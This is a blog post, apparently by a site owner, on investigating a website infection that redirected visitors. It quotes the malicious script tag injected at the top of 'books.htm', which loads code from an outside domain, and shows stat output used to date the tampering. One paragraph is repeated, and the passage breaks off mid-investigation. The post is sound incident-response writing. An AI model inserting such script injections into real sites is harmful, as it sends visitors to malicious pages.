Due to the very nature that this is a website on the Internet means that eventually it would be susceptible to an attack. Wordpress and blog sites are notoriously targeted with infections that append code to HTML files that point them to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.
Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else. I was sitting at my desk and quickly opened it to verify. Sure enough, it was:
I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.
Malware infection shown to visitors |
I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.
The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:
<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n
With the infection spotted, I checked the file's MAC times to see when the attack occurred:
$ stat books.htm File: `books.htm' Size:1500 Blocks:8 IO Block:4096 regular file Device:811h/2065d Inode:275324414 Links:1 Access: (0664/-rw-rw-r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238) Access: 2010-07-19 07:10:46.000000000 -0700 Modify: 2011-04-02 23:35:38.000000000 -0700 Change: 2011-04-02 23:35:38.000000000 -0700
Looking at the results of this file shows that the file was modified and changed on April 2nd at 11:35PM. This is just one file, so we need to compare against another file to verify the date and time. A quick spot check showed an additional HTM file with the infection: